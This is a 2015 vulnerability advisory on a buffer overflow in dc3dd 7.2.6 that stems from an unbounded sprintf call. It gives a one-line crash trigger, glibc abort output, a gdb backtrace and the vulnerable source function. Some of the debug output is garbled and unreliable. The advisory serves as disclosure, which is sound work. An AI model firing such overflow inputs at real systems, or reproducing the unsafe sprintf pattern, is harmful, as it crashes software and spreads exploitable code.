US DoD's Dc3dd v7.2.6 suffers from a Buffer Overflow vulnerability -- Advanced Information Security Corporation - Zero Day Research

From: Nicholas Lemonias. <>
Subject: US DoD's Dc3dd v7.2.6 suffers from a Buffer Overflow vulnerability -- Advanced Information Security Corporation - Zero Day Research

  DC3DD v.7.2.6 (LATEST) Security Report
                8' -  .88
                8`._.' Y8.
               d/      `8b.
              dP   .    Y8b.
             d8:'  "  `::88b
            d8"         'Y88b
           :8P    '      :888
            8a.   :     _a88P
          ._/"Yaa_:   .| 88P|
          \    YP"    `| 8P  `.
          /     \.___.d|    .'
    ~ Keeping Things Simple!
  Advanced Information Security Corporation
  Security Advisory
  Date: 14/10/2015
  Credit: Nicholas Lemonias
  Software: DC3DD v.7.2.6
 Vendor: US Department of Defense, DC3 Cybercrime Center & Air Force
  Office of Special Investigations -
  (1)  Buffer Overflow Vulnerability / ~ Deprecated & Insecure Function
  use (Missing Bounds-checks)

  Software Overview:
  The DC3DD software is a patched version of the GNU version of the
  popular UNIX imaging tool \u20ac\u02dcdd\u20ac\u2122 , with
  additional functionality, for use by forensic investigations experts.
  DC3DD is a popular package default to a number of popular Linux
  distributions. DC3DD was developed at the US Department
  of Defense, DC3 in February, 2008 and authored by Jesse Kornblum.
  i. Proof of concept
  root@kali:# dc3dd `perl -e 'print "A" x 90000'`
  dc3dd 7.2.641 started at 2015-10-13 22:15:26 +0000 compiled options:
  *** buffer overflow detected ***: dc3dd terminated
  ======== Backtrace: ========
  /lib/i386-linux-gnu/i686/cmov/ chk+0x2f)[0xb76a5acf]
  ======== Memory map: ========
  b7400000-b741c000 r-xp 00000000 00:13 15866 /lib/1386-linux-gnu/
  b741c000-b741d000 rw-p 0001b000 00:13 15866 /lib/1386-linux-gnu/libgcc_smso.1
  b743d000-b747c000 r--p 00000000 00:13 15130
  b747c000-b75ac000 r--p 00000000 00:13 15151
  b75ac000-b75ae000 rw-p 00000000 00:00 0
  b75ae000-b7752000 r-xp 00000000 00:13 1673
  b7752000-b7754000 r--p 001a4000 00:13 1673
  b7754000-b7755000 rw-p 001a6000 00:13 1673
  (gdb) bt
  #0 0xbUdebt0 in __kernel_vsyscall ()
  #1 0xb7e22307 in GI raise (sig=sig@entry=6)
  at ../nptl/sysdeps7unix/sysv/linux/raise.c:56
  #2 0xb7e239c3 in GI abort () at abort.c:89
  #3 0xb7e606f8 in --liEc message (do_abort=do abort@entry=2,
  fmt=fmt@entry=0xb7f53e55 "*** %s ***: %s terminated\n")
  at ../sysdeps/posix/libc fatal.c:175
  #4 0xb7eee2d5 in GI fortify_fail
  msg=msg@entry=0xb7f53dd6 "buffer overflow detected") at fortify_fail.c:31
  #5 0xb7eec38a in GI chk fail () at chk fail.c:28
  #6 Oxb7eebae8 in _IO str chR overflow (fp=(xbfffbf00, c=65) at
  #7 0xb7e6404e in GI 15 default xsputn (f=0xbfffbf00, data=0x800336e0, n=9015)
  at genops.c:480
  #8 0xb7e3945a in IO_vfprintf internal (s=s@entry=0xbfffbf00,
  format=<optimiied out>, format@entry=0x80025418 "command line:
  ap=0xbfffc004 "\0307\002\200\005",
  ap@entry=0xbfffc000 "\340\066\003\200\030T\002\200\005") at vfprintf.c:1642
  #9 0xb7eebba4 in vsprintf_chk
  s=s@entry=0xbfffc010 "command line: /usr/bin/dc3dd ", 'A' <repeats 171
  flags=flags@entry=1, slen=slen@entry=4096,
  format=format@entrr3x80025418 "command line: gss\n",
  args=args@entry=0xbfffc000 "\340\066\003\200\030T\002\200\005")
  at vsprintf_chk.c:85
  #10 0xb7eebacf in ____sprintf_chk
  s=0xbfffc010 "command line: /usr/bin/dc3dd ", 'A' <repeats 171 times>...,
  #11 0x80001f8f in ?? ()
  ---Type <return> to continue, or q <return> to quit---
  #12 0xb7e0da63 in __libc_start_main (main=0x2, argc=-2147464825, argv=0x0,
   init=0x800049b8, fini=0x80001af0, rtld_fini=0x2, stack_end=0xbfffd1d4)
  at libc-start.c:287
  #13 0x8002ee64 in ?? ()
  Backtrace stopped: previous frame inner to this frame (corrupt stack?)
  Program received signal SIGABRT, Aborted.
  0xb7fdebe0 in __kernel_vsyscall:
  (gdb) disas
  Dump of assembler code for function __kernel_vsyscall:
  0xb7fdebd0 <+0>:        push %ecx
  0xb7fdebdl <+1>:        push %edx
  0xb7fdebd2 <+2>:        push %ebp
  0xb7fdebd3 <+3>:        mov  %esp,%ebp
  0xb7fdebd5 <+5>:        syscenter
  0xb7fdebd7 <+7>:        nop
  0xb7fdebd8 <+8>:        nop
  0xb7fdebd9 <+9>:        nop
  0xb7fdebda <+10>:       nop
  0xb7fdebdb <+11>:       nop
  0xb7fdebdc <+12>:       nop
  0xb7fdebdd <+13>:       nop
  0xb7fdebde <+14>:       int $0x80
  => 0xb7fdebe0 <+16>:    pop %ebp
  0xb7fdebel <+17>:       pop %edx
  0xb7fdebe2 <+18>:       pop %ecx
  0xb7fdebe3 <+19>:       ret
  End of assembler dump.
  Permission Set
  root@kali:~# ls -al /usr/bin/dc3dd
  -rwxr-xr-x 1 root root 189940 Oct  9   2014  /usr/bin/dc3dd
  The permission set illustrates that the software is owned by the
  superuser, however executable by all users.
 static void
  report_command_line(int argc, char* const* argv)
     // Report compiled-in options.
     fputs(_("compiled options:"), stderr);
     report_compile_flags(stderr, false);
     for (log_t* log = job_logs; log; log = log->next_log) {
        fputs(_("compiled options:"), log->file);
        report_compile_flags(log->file, false);
     for (log_t* log = hash_logs; log; log = log->next_log) {
        fputs(_("compiled options:"), log->file);
        report_compile_flags(log->file, false);
     // Report the command line.
     char* command_line = make_cmd_line_string(argc, argv);
     char message[DISPLAY_MESSAGE_LENGTH];
     sprintf(message, _("command line: %s\n"), command_line);
     report(message, ALL_LOGS);
  Unsafe use of the sprintf() function, has been triggered which can
  facilitate a buffer overflow condition.
  Therefore, in the aforementioned experiment a char* type is written
  onto a fixed length destination buffer;
  No manual bounds checks are provided, to ensure that user-input does
  not exceed in size, and therefore
  would not overwrite the destination buffer.
 Advanced Information Security © 2015  All rights reserved
  Keeping Things Simple!

Copyright © 1995-2020 All rights reserved.